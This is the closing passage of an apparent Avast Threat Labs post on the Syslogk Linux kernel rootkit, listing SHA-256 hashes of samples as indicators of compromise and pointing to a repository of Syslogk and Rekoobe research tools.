  • 08a1273ac9d6476e9a9b356b261fdc17352401065e2fc2ad3739e3f82e68705a
  • cf525918cb648c81543d9603ac75bc63332627d0ec070c355a86e3595986cbb3
  • 42bc744b22173ff12477e57f85fa58450933e1c4294023334b54373f6f63ee42
  • 337674d6349c21d3c66a4245c82cb454fea1c4e9c9d6e3578634804793e3a6d6
  • 4effa5035fe6bbafd283ffae544a5e4353eb568770421738b4b0bb835dad573b
  • 5b8059ea30c8665d2c36da024a170b31689c4671374b5b9b1a93c7ca47477448
  • bd07a4ccc8fa67e2e80b9c308dec140ca1ae9c027fa03f2828e4b5bdba6c7391
  • bf09a1a7896e05b18c033d2d62f70ea4cac85e2d72dbd8869e12b61571c0327e
  • 79916343b93a5a7ac7b7133a26b77b8d7d0471b3204eae78a8e8091bfe19dc8c
  • c32e559568d2f6960bc41ca0560ac8f459947e170339811804011802d2f87d69
  • 864c261555fce40d022a68d0b0eadb7ab69da6af52af081fd1d9e3eced4aee46
  • 275d63587f3ac511d7cca5ff85af2914e74d8b68edd5a7a8a1609426d5b7f6a9
  • 031183e9450ad8283486621c4cdc556e1025127971c15053a3bf202c132fe8f9


Syslogk research tools

Rekoobe research tool

IoC repository

The Syslogk and Rekoobe rootkit research tools and IoCs are in our IoC repository.

The post Linux Threat Hunting: β€˜Syslogk’ a kernel rootkit found under development in the wild appeared first on Avast Threat Labs.
